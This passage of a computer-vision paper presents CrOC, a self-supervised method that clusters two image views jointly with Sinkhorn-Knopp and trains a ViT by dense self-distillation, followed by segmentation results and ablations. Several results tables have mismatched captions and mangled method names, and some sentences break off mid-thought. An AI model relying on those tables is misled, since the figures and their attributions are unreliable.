One can observe that the _link_ operation is provided for free and that it is trivial to discard any cluster that does not span across the two views. Given the view-wise assignments \(\mathbf{Q}^{*}_{\{1,2\}}\), and the corresponding dense representations \(\mathbf{Z}_{\{1,2\}}\), \(K\) object/cluster-level representations can be obtained for each view: \[\mathbf{C}^{\top}_{1}=\mathbf{Z}^{\top}_{1}\mathbf{Q}^{*}_{1} \tag{1}\] \(\mathbf{C}\) denotes the centroids. Analogously to the image-level consistency objective, one can enforce similarity constraints between pairs of centroids. ### Dense self-distillation This section details the integration of the _join-locate-split_ strategy (Sec. 3.1) in a self-distillation scheme1. Our self-distillation approach relies on a teacher-student pair of Siamese networks, \(g_{t}\) and \(g_{s}\), each composed of an encoder \(f_{\{t,s\}}\) and a projection head \(h_{\{t,s\}}\). Given the input image \(\mathbf{x}\in\mathbb{R}^{C\times H\times W}\), two augmented views \(\tilde{\mathbf{x}}_{1}\) and \(\tilde{\mathbf{x}}_{2}\) are obtained using random augmentations. Both augmented views are independently passed through the teacher and student encoders, yielding the spatial representations \(\mathbf{Z}_{t,\{1,2\}}\) and \(\mathbf{Z}_{s,\{1,2\}}\), respectively. The teacher model's representations are concatenated (_join_) and fed to the clustering algorithm (Sec. 3.3) to obtain the assignment matrix \(\mathbf{Q}^{*}\) (_locate_), which is assumed to be already filtered of any column corresponding to an object/cluster represented in only one of the two views (cf. Sec. 3.3.1). The assignment matrix is _split_ view-wise to get \(\mathbf{Q}^{*}_{\{1,2\}}\) and to compute the teacher and student centroids of each view: Footnote 1: Our implementations build upon DINO [6], but it’s not limited to it. \[\mathbf{C}^{\top}_{\{t,s\},\{1,2\}}=\mathbf{Z}^{\top}_{\{t,s\},\{1,2\}} \mathbf{Q}^{*}_{\{1,2\}} \tag{2}\] The final step is to feed the teacher and student centroids, \(\mathbf{C}_{t}\) and \(\mathbf{C}_{s}\), to the corresponding projection heads, \(h_{t}\) and \(h_{s}\), which output probability distributions over \(L\) dimensions denoted by \(\mathbf{P}_{t}\) and \(\mathbf{P}_{s}\), respectively. The probabilities of the teacher and student models are obtained by normalizing their projection heads' outputs with a softmax scaled Figure 2: **Overview of CrOC.** The augmented views, \(\tilde{\mathbf{x}}_{1}\) and \(\tilde{\mathbf{x}}_{2}\), are processed independently by a ViT encoder \(f\). The _joint_ representation, \(\mathbf{Z}_{\text{cat}}\), of the two image views, is obtained by concatenation along the token axis and serves as input to the clustering algorithm, \(\mathcal{C}\), to _locate_ the objects. The joint clustering assignments, \(\mathbf{Q}^{*}\), are _split_ view-wise and used to compute the corresponding centroids. A self-distillation loss enforces consistency between pairs of related centroids via a projection head \(h\). 
by temperatures \(\tau_{t}\) and \(\tau_{s}\): \[\begin{split}\mathbf{P}_{t,\{1,2\}}&=\underset{L}{ \texttt{softmax}}\left(h_{t}(\mathbf{C}_{t,\{1,2\}})/\tau_{t}\right)\\ \mathbf{P}_{s,\{1,2\}}&=\underset{L}{\texttt{softmax }}\left(h_{s}(\mathbf{C}_{s,\{1,2\}})/\tau_{s}\right)\end{split} \tag{3}\] The dense self-distillation objective \(\mathcal{L}_{\text{dense}}\) enforces cross-view consistency of the teacher and student model projections using the cross-entropy loss: \[\mathcal{L}_{\text{dense}}=\frac{1}{2}\left(H(\mathbf{P}_{t,1},\mathbf{P}_{s, 2})+H(\mathbf{P}_{t,2},\mathbf{P}_{s,1})\right) \tag{4}\] where \(H(\mathbf{A},\mathbf{B})=-\frac{1}{K}\sum_{k=1}^{K}\sum_{l=1}^{L}\mathbf{A}_{ kl}\log(\mathbf{B}_{kl})\) computed by averaging over all clusters. For the dense self-distillation loss to be meaningful, the clustering assignments of spatial tokens corresponding to similar objects must be semantically coherent, which requires good-quality representations. To address this issue, we additionally apply a global representation loss by feeding the image-level representations to a dedicated projection head, \(\vec{h}\), to obtain the \(\vec{L}\)-dimensional distributions: \[\begin{split}\boldsymbol{p}_{t,\{1,2\}}&=\underset{ \vec{L}}{\texttt{softmax}}\left(\vec{h}_{t}(\vec{\boldsymbol{z}}_{t,\{1,2\}} /\tau_{t})\right)\\ \boldsymbol{p}_{s,\{1,2\}}&=\underset{\vec{L}}{ \texttt{softmax}}\left(\vec{h}_{s}(\vec{\boldsymbol{z}}_{s,\{1,2\}}/\vec{ \boldsymbol{\tau}}_{s})\right)\end{split} \tag{5}\] The sharpness of the output distribution for teacher and student models is controlled by the temperature parameters \(\vec{\tau}_{t}\) and \(\vec{\tau}_{s}\), respectively, and \(\vec{\boldsymbol{z}}_{\{t,s\}}\) denotes the image-level representations of the teacher and student models. Hence the global representation loss \(\mathcal{L}_{\text{glob}}\) is computed as follows: \[\mathcal{L}_{\text{glob}}=\frac{1}{2}\left(H(\boldsymbol{p}_{t,1},\boldsymbol{ p}_{s,2})+H(\boldsymbol{p}_{t,2},\boldsymbol{p}_{s,1})\right) \tag{6}\] where \(H(\mathbf{a},\mathbf{b})=-\sum_{l=1}^{\vec{L}}\mathbf{a}_{l}\log(\mathbf{b}_{ l})\). Therefore, the overall loss function used for the training of CrOC is: \[\mathcal{L}=\alpha\mathcal{L}_{\text{dense}}+\mathcal{L}_{\text{glob}} \tag{7}\] where \(\alpha\) denotes a hyperparameter to balance the loss terms. We set \(\alpha=1.0\) for all experiments without the need for hyperparameter tuning. ### Where are the objects in the image? So far, we assumed that there existed an algorithm able to assign a set of input data points to an undetermined number of clusters. This section covers the details of this algorithm. The online optimization objective for computing the clusters and corresponding assignments relies on an optimal transport formulation and the Sinkhorn-Knopp algorithm [10]. This choice is motivated by _i)_ its efficiency, _ii)_ the ease of incorporating external knowledge (Sec. 3.3.2), and _iii)_ it returns a measure of the clustering quality, which can be used to infer the optimal number of clusters \(K\) for a given image. The last point is of utmost importance as it allows us to devise a _ad-hoc_ selection criterion for \(K\). Indeed, the iterative procedure progressively merges the centroids until only two remain, i.e., background/foreground (see Fig. 3). The number of centroids \(K\) is selected _a posteriori_ and independently for each image in the batch. 
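Before turning to the clustering algorithm itself, the dense branch of the objective (Eqs. 2-4) can be written out in a few lines. The sketch below is an illustrative NumPy rendition, not the released implementation: the toy sizes, the random arrays standing in for ViT features and assignments, and the single linear map used in place of the projection head \(h\) are assumptions made for the example, and the teacher centering and momentum update of DINO-style training are omitted.

```python
import numpy as np
rng = np.random.default_rng(0)

N, d, K, L = 196, 384, 4, 64              # toy sizes: tokens, feature dim, clusters, prototypes
tau_t, tau_s = 0.07, 0.10                 # teacher / student temperatures

def softmax(x):
    e = np.exp(x - x.max(axis=-1, keepdims=True))
    return e / e.sum(axis=-1, keepdims=True)

def centroids(Z, Q):                      # Eq. (2): C^T = Z^T Q, i.e. C = Q^T Z with shape (K, d)
    return Q.T @ Z

def probs(C, W, tau):                     # Eq. (3), with a linear map W standing in for the head
    return softmax(C @ W / tau)

def H(P_t, P_s):                          # cross-entropy averaged over the K centroids (Eq. 4)
    return -(P_t * np.log(P_s + 1e-12)).sum(axis=-1).mean()

W_t, W_s = rng.normal(size=(d, L)), rng.normal(size=(d, L))
Z_t1, Z_t2, Z_s1, Z_s2 = (rng.normal(size=(N, d)) for _ in range(4))
Q1, Q2 = (softmax(rng.normal(size=(N, K))) for _ in range(2))   # view-wise splits of Q*

loss_dense = 0.5 * (H(probs(centroids(Z_t1, Q1), W_t, tau_t), probs(centroids(Z_s2, Q2), W_s, tau_s))
                    + H(probs(centroids(Z_t2, Q2), W_t, tau_t), probs(centroids(Z_s1, Q1), W_s, tau_s)))
print(float(loss_dense))
```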
More formally, let's consider a ViT encoder \(f\) fed with a positive pair of augmented views, \(\tilde{\boldsymbol{x}}_{1}\) and \(\tilde{\boldsymbol{x}}_{2}\), and yielding the corresponding representations, \(\mathbf{Z}_{1}\) and \(\mathbf{Z}_{2}\). The clustering is performed on the joint representation, \(\mathbf{Z}_{\text{cat}}\in\mathbb{R}^{2N\times d}\) obtained from the concatenation of \(\mathbf{Z}_{1}\) and \(\mathbf{Z}_{2}\) along the token axis. The procedure starts by sampling \(K_{\text{start}}\) of the \(2N\) tokens, which serve as initialization for the centroids, \(\mathbf{C}\in\mathbb{R}^{K_{\text{cat}}\times d}\): \[\mathbf{C}=\mathbf{Y}^{\top}\mathbf{Z}_{\text{cat}} \tag{8}\] where \(\mathbf{Y}\in\{0,1\}^{2N\times K_{\text{cat}}}\) is a matrix of column one-hot vectors indicating the position of the \(K_{\text{start}}\) tokens used to initialize the centroids. The sampling is based on the _attention map_ of the [CLS] token, which highlights the patches proportionally to their contribution to the image-level representation. The cost of assigning a token to a given centroid should reflect their similarity, hence: \[\mathbf{T}^{\text{(sem)}}=-\mathbf{Z}_{\text{cat}}\mathbf{C}^{\top} \tag{9}\] where \(\mathbf{T}^{\text{(sem)}}\in\mathbb{R}^{2N\times K}\) denotes the cost matrix of the assignments. A handy property of the selected clustering algorithm is that it offers the possibility to scale the importance of the tokens and centroids based on external knowledge injected using a token distribution \(\mathbf{r}\) and a centroid distributions \(\mathbf{c}\). Here, the _attention map_ of the [CLS] token is used as the token distribution due to its ability to highlight the sensible semantic regions of the image [6]. Along the same line, the centroids distribution is defined as: \[\mathbf{c}=\underset{\mathbf{softmax}}{\text{softmax}}(\mathbf{Y}^{\top} \mathbf{r}) \tag{10}\] Given the cost matrix, \(\mathbf{T}^{\text{(sem)}}\), and the two marginals, \(\mathbf{r}\) and \(\mathbf{c}\), the Sinkhorn-Knopp clustering produces the assignment matrix \(\mathbf{Q}^{*}\): \[\mathbf{Q}^{*}=\underset{\mathbf{Q}\in\mathcal{U}(\mathbf{r},\mathbf{c})}{ \operatorname{arg\,min}}<\mathbf{Q},\mathbf{T}^{\text{(sem)}}>-\frac{1}{ \lambda}H(\mathbf{Q}) \tag{11}\] where \(<\cdot,\cdot>\) denotes the entry-wise product followed by a sum reduction. The second term is a regularization of the entropy of the assignments, i.e., it controls the sharpness of the clustering. \(\mathcal{U}(\mathbf{r},\mathbf{c})\) is the transportation polytope, i.e., the set of valid assignments defined as: \[\mathcal{U}(\mathbf{r},\mathbf{c})=\{\mathbf{Q}\in\mathbb{R}_{+}^{2N\times K} \mid\mathbf{Q}\mathbf{1}_{K}=\mathbf{r},\mathbf{Q}^{\top}\mathbf{1}_{2N}= \mathbf{c}\} \tag{12}\] Additionally, the transportation cost \(d_{\text{c}}\) measures the cost of assigning the tokens to the different centroids and can therefore be interpreted as the quality of the clustering, i.e., the ability to find a representative centroid for each token. 
\[d_{\text{c}}=\text{$<$}\mathbf{Q}^{*},\mathbf{T}^{\text{(sem)}}> \tag{13}\] The centroids are updated after each step (\(\mathbf{C}^{\top}=\mathbf{Z}^{\top}\mathbf{Q}^{*}\)), and the two centroids, \((i^{*},j^{*})\), having the highest cosine similarity, are merged: \[\mathbf{C},\mathbf{Y}\leftarrow\texttt{merge}(\mathbf{C},\mathbf{Y},i^{*},j^{*}) \tag{14}\] where merge denotes the merging operator; the merging procedure averages the selected columns of \(\mathbf{Y}\) and the corresponding rows of \(\mathbf{C}\); in both cases, obsolete columns/rows are simply removed from the matrices. Before reiterating through the clustering algorithm, the matrix cost, \(\mathbf{T}^{\text{(sem)}}\), and centroid distribution, \(\mathbf{c}\), are updated using Eq. 9 and Eq. 10, respectively. The whole procedure is repeated until only two centroids remain. By comparing the transportation cost \(d_{\text{c}}\) incurred at each step (from \(K_{\text{start}}\) to 2), one can select _a posteriori_ the optimal number of centroids and the corresponding assignment \(\mathbf{Q}^{*}\) for each image independently based on the \(\mathbf{Q}^{*}\) that minimizes \(d_{\text{c}}\). The procedure's final step consists of the row-wise normalization of the assignments and the pruning of clusters (cf. Sec. 3.3.1). #### 3.3.1 Cluster pruning An important property of CrOC is that it allows to easily discard clusters corresponding to content that is not shared across the two views (e.g., purple cluster corresponding to the helmet in Fig. 2). To that end, we first compute the hard version of the assignments (each token is assigned to precisely one centroid): \[\mathbf{M}_{n,k}=\mathds{1}_{k=\underset{j}{\text{argmax}}}\{\mathbf{Q}^{*}_{ nj}\} \tag{15}\] The hard assignments are split view-wise to obtain \(\mathbf{M}_{1}\) and \(\mathbf{M}_{2}\), and we introduce the sets \(\mathcal{S}_{1}\) and \(\mathcal{S}_{2}\), which store indices of the zero columns of \(\mathbf{M}_{1}\), and \(\mathbf{M}_{2}\), respectively. Therefore, any column of \(\mathbf{Q}^{*}_{\{1,2\}}\) and \(\mathbf{M}_{\{1,2\}}\), whose index is in \(\mathcal{S}=\mathcal{S}_{1}\cup\mathcal{S}_{2}\), is filtered out: \[\mathbf{Q}^{*}_{\{1,2\}},\mathbf{M}_{\{1,2\}}\leftarrow\texttt{filter}( \mathbf{Q}^{*}_{\{1,2\}},\mathbf{M}_{\{1,2\}},\mathcal{S}) \tag{16}\] where filter denotes the filtering operator, which drops the indexed columns of the input matrices. #### 3.3.2 Positional cues In Sec. 3.2, we mention the need for an image-level self-distillation loss to break the interdependence between the features' quality and the correctness of the enforced dense loss. Along the same line, positional cues can be leveraged to guide the clustering operation, such that spatially coherent clusters can be obtained even when the features do not fully capture the semantics of the underlying data. Indeed, it appears natural to bias the clustering in favor of matching together tokens resulting from the same region **in the original image**. To that end, a positional constraint is added to the matrix transportation cost \(\mathbf{T}^{\text{(sem)}}\), which is modified to incorporate this desired property. 
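Before the positional term is introduced, the core loop of Eqs. (8)-(14), including the a-posteriori choice of the number of centroids via the transportation cost \(d_{\text{c}}\), can be summarized in code. The following is a simplified NumPy sketch, not the official implementation: the attention-based seeding is reduced to a top-\(K_{\text{start}}\) selection, a fixed number of Sinkhorn iterations replaces a convergence test, and the view-wise pruning of Eqs. (15)-(16) is left out.

```python
import numpy as np

def softmax(x):
    e = np.exp(x - x.max())
    return e / e.sum()

def sinkhorn(T, r, c, lam=20.0, n_iter=200):
    """Entropy-regularized assignment of Eq. (11): Q with marginals Q 1 = r and Q^T 1 = c."""
    K = np.exp(-lam * (T - T.min()))          # shift for numerical stability only
    u = np.ones_like(r)
    for _ in range(n_iter):
        v = c / (K.T @ u + 1e-12)
        u = r / (K @ v + 1e-12)
    return u[:, None] * K * v[None, :]

def croc_cluster(Z, attn, K_start=12):
    """Seed K_start centroids from the most attended tokens (Eq. 8), then alternate Sinkhorn
    assignment, centroid update and merging (Eqs. 9-14), keeping the assignment with the
    lowest transportation cost d_c (Eq. 13)."""
    r = attn / attn.sum()                     # token marginal from the [CLS] attention map
    seeds = np.argsort(attn)[-K_start:]
    C, m = Z[seeds].copy(), r[seeds].copy()   # centroids and their (pre-softmax) masses, Eq. (10)
    best_cost, best_Q = np.inf, None
    while C.shape[0] >= 2:
        T = -Z @ C.T                          # semantic cost, Eq. (9)
        Q = sinkhorn(T, r, softmax(m))
        cost = (Q * T).sum()                  # d_c, Eq. (13)
        if cost < best_cost:
            best_cost, best_Q = cost, Q
        C = Q.T @ Z                           # centroid update
        if C.shape[0] == 2:
            break
        Cn = C / (np.linalg.norm(C, axis=1, keepdims=True) + 1e-12)
        S = Cn @ Cn.T - 2.0 * np.eye(C.shape[0])        # cosine similarities, diagonal suppressed
        i, j = np.unravel_index(np.argmax(S), S.shape)
        C[i], m[i] = (C[i] + C[j]) / 2.0, (m[i] + m[j]) / 2.0   # merge the two closest centroids
        C, m = np.delete(C, j, axis=0), np.delete(m, j)
    return best_Q / (best_Q.sum(axis=1, keepdims=True) + 1e-12) # row-wise normalization

# Toy usage: random unit-norm "joint" tokens of the two views (2N x d) and a random attention map
rng = np.random.default_rng(0)
Z_cat = rng.normal(size=(2 * 196, 64))
Z_cat /= np.linalg.norm(Z_cat, axis=1, keepdims=True)
Q_star = croc_cluster(Z_cat, rng.random(2 * 196))
print(Q_star.shape)
```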
We start by observing that the augmented views, \(\tilde{\boldsymbol{x}}_{\{1,2\}}\), result from the composition and use of a set of geometric and photometric transformations on the original image Figure 4: The positional cues use the top-left corner of the **original image** as a reference point, such that the position coordinates of each view lie in the same space and can be used to guide the clustering algorithm. Figure 3: **Representation of the iterative clustering algorithm in the joint space.** The algorithm is initialized with a fixed number of centroids that are iteratively merged until only two remain. The ideal number of centroids is determined _a posteriori_. The procedure’s last seven steps (columns) are represented for three different heads of a ViT-S/16 pre-trained with CrOC. \(\mathbf{x}\). We propose to extract the coordinates of the patches in each view with respect to the original image referential (cf. Fig. 4). More precisely, we generate the tensors, \(\mathbf{E}_{\{1,2\}}\in\mathbb{R}^{N\times 2}\), which store the 2D coordinates of each patch in the two views. The coordinates are first concatenated along the patch/token axis to obtain \(\mathbf{E}_{\text{cat}}\in\mathbb{R}^{2N\times 2}\), and the positions of the centroids, \(\mathbf{E}_{\text{cen}}\in\mathbb{R}^{K_{\text{cat}}\times 2}\), are computed as in Eq. 8 (\(\mathbf{E}_{\text{cen}}=\mathbf{Y}^{\top}\mathbf{E}_{\text{cat}}\)). The entries of the positional transportation cost \(\mathbf{T}^{\text{(pos)}}\in\mathbb{R}^{2N\times K_{\text{cat}}}\) are computed as follows: \[\mathbf{T}^{\text{(pos)}}_{ij}=\frac{1}{S}||\mathbf{e}^{\text{(cat)}}_{i}- \mathbf{e}^{\text{(gen)}}_{j}||_{2} \tag{17}\] where \(S\) is a normalization constant that ensures that the entries of the positional transportation cost are in \([0,1]\). After incorporation of the positional bias, the total matrix transportation cost is defined as follows: \[\mathbf{T}^{\text{(tot)}}=\mathbf{T}^{\text{(sem)}}+\lambda_{\text{pos}} \mathbf{T}^{\text{(pos)}} \tag{18}\] The scalar weight \(\lambda_{\text{pos}}\) regulates the importance of the positional cues. As detailed in Sec. 3.3, the clustering algorithm relies on the iterative merging of the centroids; hence their respective position must also be merged reciprocally, i.e., by averaging (cf. Eq. 14). #### 3.3.3 Multiple clustering assignments using MSA In this section, we detail a mechanism to obtain multiple complementary clustering assignments \(\mathbf{Q}^{*}\) per image. This mechanism relies on the multi-head self-attention (MSA) module inherent to the transformer architecture. Arguably, the main ingredient behind the transformer architecture's success is the self-attention module. Indeed, _i)_ it allows capturing of long-range inter-dependencies between the patches that constitute the image, and _ii)_ it endows the local representations with global or contextual information. 
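Returning to the positional cues, Eqs. (17)-(18) admit a direct implementation. The snippet below is only schematic: the crop offsets, the patch grid, and the choice of the normalization constant \(S\) (here, the largest observed distance) are assumptions made for illustration rather than the bookkeeping of the actual augmentation pipeline.

```python
import numpy as np

def positional_cost(E_cat, E_cen, lam_pos=4.0):
    """Eqs. (17)-(18): token-to-centroid distances in the original-image frame, normalized
    to [0, 1] and scaled by lambda_pos, ready to be added to the semantic cost T^(sem)."""
    D = np.linalg.norm(E_cat[:, None, :] - E_cen[None, :, :], axis=-1)   # (2N, K)
    return lam_pos * D / (D.max() + 1e-12)

# Schematic patch coordinates of two 14x14 views with assumed crop offsets (in pixels)
N_side, patch = 14, 16
grid = np.stack(np.meshgrid(np.arange(N_side), np.arange(N_side), indexing="ij"), -1)
grid = grid.reshape(-1, 2) * patch
E_cat = np.concatenate([grid + np.array([10, 30]), grid + np.array([120, 60])]).astype(float)
Y = np.eye(E_cat.shape[0])[:, :12]            # one-hot initialization of 12 centroids
E_cen = Y.T @ E_cat                           # centroid coordinates
print(positional_cost(E_cat, E_cen).shape)
```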
Formally, the multi-head attention operation of the \(l^{th}\) transformer block is expressed as: \[\begin{split}\texttt{multi-head}&\left(\mathbf{Z}^{(l- 1)}\right)\\ &=\texttt{concat}\left(\text{head}_{1},...,\text{head}_{n_{h}} \right)\mathbf{W}^{o}\end{split} \tag{19}\] where \(\mathbf{W}^{o}\in\mathbb{R}^{d\times d}\) is a learnable projection weight, and \(\text{head}_{i}\), for \(i=1,\cdots,n_{h}\), denotes a single attention head: \[\begin{split}\text{head}_{i}&=\texttt{attention} \left(\mathbf{Z}^{(l-1)},\mathbf{W}^{\{q,k,v\}}_{i}\right)\\ &=\texttt{softmax}\left(\frac{\mathbf{Z}^{(l-1)}\mathbf{W}^{q}_{ i}\left(\mathbf{Z}^{(l-1)}\mathbf{W}^{k}_{i}\right)^{\top}}{\sqrt{D}} \right)\mathbf{Z}^{(l-1)}\mathbf{W}^{v}_{i}\end{split} \tag{20}\] where \(\mathbf{W}^{\{q,k,v\}}_{i}\in\mathbb{R}^{d\times d/n_{h}}\) denotes head-specific learnable projection weights2. Following the same reasoning that motivates the use of multiple heads, i.e., the inter-patches relationship is not unique, we use as many clustering assignments as there are heads in the MSA module. In practice, it turns out to be as simple as independently feeding each attention head's dense representation to the clustering algorithm: Footnote 2: The layer index, which starts from 0, is omitted. \[\mathbf{Q}^{i}=\mathcal{C}\left(\mathbf{Z}^{(B-2)}\mathbf{W}^{k}_{i}\right) \tag{21}\] where \(B\) is the number of transformer blocks in the model. Note that only one of the keys/queries/values representation is used (here exemplified with the keys). Consequently, the final assignment matrix \(\mathbf{Q}^{*}\) results from the concatenation of the head-wise assignments \(\mathbf{Q}^{i}\) along the centroid dimension. Up to pruning (Sec. 3.3.1), the effective number of centroids is \(n_{h}\) times higher. Even though the clusters overlap, we do not enforce contradictory objectives as _i)_ the consistency is enforced pair-wise (from one centroid in the first view to the corresponding one in the second view) and _ii)_ in the framework of self-distillation there are no negative pairs. ## 4 Experiments ### Implementations details **Pre-training datasets.** Our models are pre-trained on two uncurated and scene-centric datasets, namely COCO (train2017, \(\sim\)118k images) and COCO+ (unlabeled2017 + train2017, \(\sim\)241k images). We further explore the possibility of using CrOC in an object-centric scenario and therefore adopt ImageNet [11] as a pre-training dataset (\(\sim 10\times\) more images and \(\sim 4\times\) fewer objects/image). **Network architecture.** We use a ViT-small (ViT-S/16) as the backbone \(f\). This choice is in line with its adoption in concurrent methods and for its comparability [6, 49, 51] with the ResNet50, which is the backbone of the remaining baselines. The architecture of the projection heads is identical to that of [6]. Notably, the image-level and centroids-level heads, \(\overline{h}\) and \(h\), share their weights except for the last layer, which has output dimensions, \(\overline{L}=65,536\) and \(L=8,192\), respectively. **Optimization.** CrOC is trained for 300 epochs on COCO and COCO+ under an identical optimization scheme. A batch size of 256, distributed over 2 Tesla V100 GPUs is used. The pre-training on ImageNet uses a batch size of 1024, distributed over 4 AMD MI250X GPUs. The remaining optimization setting is identical to that of DINO [6]. **Hyperparameters.** The same weight is given to the dense and global loss, i.e., \(\alpha=1\). 
We use \(\lambda=20\) for the regularization term of the transportation objective. The dense and global projection heads use the same temperature parameters, namely \(\overline{\tau}_{s}=\tau_{s}=0.1\) and \(\overline{\tau}_{t}=\tau_{t}=0.07\) (see Eqs. 3 & 5). Generally, any hyper-parameter common to DINO uses its recommended value. The results of section 4.3 which use COCO or COCO+ as pre-training datasets are obtained with \(\lambda_{\text{pos}}=4\), \(K_{\text{start}}=12\) and the values tokens as parameters of the clustering algorithm. For ImageNet, we only report results with \(\lambda_{\text{pos}}=3\), \(K_{\text{start}}=12\) and the keys tokens. These values correspond to the default setting of the grid search performed on COCO (see Sec. 4.4). ### Evaluation protocols We opt for dense evaluation downstream tasks, which require as little manual intervention as possible, such that the reported results truly reflect the quality of the features. Details of the implementations and datasets are available in Appendix C. **Transfer learning via linear segmentation.** The linear separability of the learned spatial features is evaluated by training a linear layer on top of the frozen features of the pre-trained encoder. The linear layer implements a mapping from the embedding space to the label space and is trained to minimize the cross-entropy loss. We report the mean Intersection over Union (mIoU) of the resulting segmentation maps on four different datasets, namely, PVOC12 [13], COCO-Things, COCO-Stuff [29] and ADE20K [50]. **Transfer learning via unsupervised segmentation.** We evaluate the ability of the methods to produce spatial features that can be grouped into coherent clusters. We perform K-Means clustering on the spatial features of every image in a given dataset with as many centroids as there are classes in the dataset. Subsequently, a label is assigned to each cluster via Hungarian matching [25]. We report the mean Intersection over Union (mIoU) of the resulting segmentation maps on three different datasets, namely PVOC12 [13], COCO-Things, and COCO-Stuff [29]. **Semi-supervised video object segmentation.** We assess our method's generalizability for semi-supervised video object segmentation on the DAVIS'17 benchmark. The purpose of this experiment is to evaluate the spatiotemporal consistency of the learned features. First, the features of each frame in a given video are independently obtained; secondly, a nearest-neighbor approach is used to propagate (from one frame to the next) the ground-truth labels of the first frame (see results in Appendix D). ### Segmentation results In Tables 1 and 2, we report mIoU results on the linear segmentation task. When pre-trained on COCO, CrOC exceeds concurrent methods using COCO(+) as pre-training datasets, even though ORL and BYOL use a longer training protocol (800 epochs). With a pre-training on COCO+, CrOC outperforms all other methods, except CP\({}^{2}\)[39], on every evaluation dataset, despite their usage of ImageNet and their finetuning on one of the target datasets (PVOC12). Noteworthy that CP\({}^{2}\) is initialized with a pre-trained model and cannot be trained from scratch. Pre-training on a larger and object-centric dataset appears to be highly beneficial in that setting. In Table 3, the results for the unsupervised segmentation task are reported. As for linear segmentation experiments, CrOC is already competitive with only a pre-training on the COCO dataset and surpasses all competing methods except DenseCL [41]. 
The largest improvements are observed on the COCO-Stuff dataset; this is unsurprising as this dataset contains semantic labels such as water, ground, or sky, which correspond to regions that are typically overlooked by other methods, but on which CrOC puts a significant emphasis. The model pre-trained on ImageNet appears to perform poorly on that task, which is surprising considering the excellent results depicted in Table 1 on the exact same datasets. This might hint that \begin{table} \begin{tabular}{l l c c c c} \hline \hline Method & Model / Dataset & PVOC12 & CC-Th. & CC-St. & Avg. \\ \hline _Global features_ & & & & & \\ BYOL [15] & ResNet50 / CC+ & 38.7 & 50.4 & 39.8 & 43.0 \\ DINO [6] & ViT-S/16 / CC & 47.2 & 47.1 & 46.2 & 46.8 \\ \hline _Local features_ & & & & & \\ ORL [7] & ResNet50 / CC+ & 45.2 & 55.6 & 45.6 & 48.8 \\ Dennet [41] & ResNet50 / IN & 57.9 & 60.4 & 47.5 & 55.3 \\ SoCo [43] & ResNet50 / IN & 54.0 & 56.8 & 44.2 & 51.7 \\ ResSim [45] & ResNet50 / IN & 55.1 & 57.7 & 46.5 & 53.1 \\ FixPro [48] & ResNet50 / IN & 57.1 & 54.7 & 45.9 & 52.6 \\ VICRegL [2] & ResNet50 / IN & 58.9 & 58.7 & 48.2 & 55.3 \\ MPA [18] & ViT-S/16 / CC & 31.7 & 35.1 & 39.6 & 35.5 \\ CP\({}^{2}\)[39] & ViT-S/16 / IN+PVOC12 & 63.1 & 59.4 & 46.5 & 56.3 \\ \hline _Ours_ & & & & & \\ \hline **CrOC** & ViT-S/16 / CC+ & 54.5 & 55.6 & 49.7 & 53.3 \\ CoCo & ViT-S/16 / CC+ & 60.6 & 62.7 & 51.7 & 58.3 \\ CCO & ViT-S/16 / IN & **70.6** & **66.1** & **52.6** & **63.1** \\ \hline \hline \end{tabular} \end{table} Table 2: **Transfer results of linear segmentation task.** A linear layer is trained on top of the frozen spatial features. The mIoU scores are reported for ADE20k [50]. The pre-training dataset is either ImageNet [11], COCO, or COCO+. \begin{table} \begin{tabular}{l c c c c} \hline \hline Method & Model & Dataset & Epochs & mIoU \\ \hline _Global features_ & & & & \\ DINO [6] & ViT-S/16 & COCO & 300 & 18.5 \\ DINO [6] & ViT-S/16 & ImageNet & 800 & 26.8 \\ \hline _Local features_ & & & & \\ DenseCL [41] & ResNet50 & ImageNet & 200 & 24.3 \\ VICRegL [2] & ResNet50 & ImageNet & 300 & 23.7 \\ CP\({}^{2}\)[39] & ViT-S/16 & ImageNet+PVOC12 & 320 & 25.4 \\ \hline _Ours_ & & & & \\ \hline _Croc_ & ViT-S/16 & COCO & 300 & 23.2 \\ Croc & ViT-S/16 & COCO+ & 300 & 27.0 \\ Croc & ViT-S/16 & ImageNet & 300 & **28.4** \\ \hline \hline \end{tabular} \end{table} Table 1: **Transfer results of linear segmentation task.** A linear layer is trained on top of the frozen spatial features. The mIoU scores are trained on top of the frozen spatial features. The mIoU scores are reported on the PVOC12 [13], COCO-Things (CC-Th.), and COCO-Stuff (CC-St.) [29]. The pre-training dataset is either of ImageNet (IN) [11], COCO (CC), or COCO+ (CC+). are not adjustable to each baseline is sub-optimal. Overall we observe that producing features that can be clustered class-wise without labels remains an open challenge. ### Ablation study We scrutinize the roles played by different components of CrOC. Unless otherwise stated, \(\lambda_{\text{pos}}=3\), \(K_{\text{start}}=12\) and the keys tokens are used for the ablations. Rows corresponding to the chosen setting are highlighted. **Weight of the positional cues \(\lambda_{\text{pos}}\).** The first element that is ablated is the contribution of the positional bias to the overall performance. In Table 4, we observe that an increased positional bias leads to improved performance on the unsupervised segmentation task, but a slightly worsened one on the linear segmentation task. 
**Number of initial centroids \(K_{\text{start}}\).** As can be seen in Table 5, the linear segmentation scores monotonically increase with the number of initial centroids, whereas for unsupervised segmentation, there seems to be a middle ground. **Type of clustering tokens.** Table 6 shows that the choice of spatial tokens plays a determinant role in the downstream results and that the multi-clustering approach (Sec. 3.3.3) can yield a significant boost in performance compared to the case when the clustering uses last spatial tokens \(\mathbf{Z}^{(B-1)}\) (last). ## 5 Conclusion We introduced CrOC; a novel SSL pre-training method for dense downstream tasks. CrOC does not resort to using hand-crafted priors and the online clustering algorithm generates pseudo labels for both views in a single and united step. As such, the generated segmentation masks are more coherent and avoid encouraging similarity between objects not univocally represented in both views. CrOC is thoroughly evaluated on various downstream tasks and datasets. In spite of being pre-trained on a medium size scene-centric dataset, the proposed learning paradigm is competitive or outperforms existing methods using ImageNet. **Limitation.** As is the case with most dense SSL methods, CrOC is only implemented and tested with a single model. ## Acknowledgement This work is supported by the Personalized Health and Related Technologies (PHRT), grant number 2021/344. This project is also partially funded by the European Research Council (ERC) under the European Union's Horizon 2020 research and innovation program (Grant Agreement No. 101021347). We acknowledge EuroCC Belgium for awarding this project access to the LUMI supercomputer, owned by the EuroHPC Joint Undertaking, hosted by CSC (Finland) and the LUMI consortium. \begin{table} \begin{tabular}{l c c c c c} \hline \hline & \multicolumn{2}{c}{PVOC12} & \multicolumn{2}{c}{COCO-Things} & \multicolumn{2}{c}{COCO-Suff} \\ \cline{2-6} Tokens & Unsupervised & Linear & Unsupervised & Linear & Unsupervised & Linear \\ \hline last & 11.2 & 52.6 & 12.7 & 54.6 & 16.0 & 49.1 \\ queries & 8.3 & 55.1 & 7.6 & 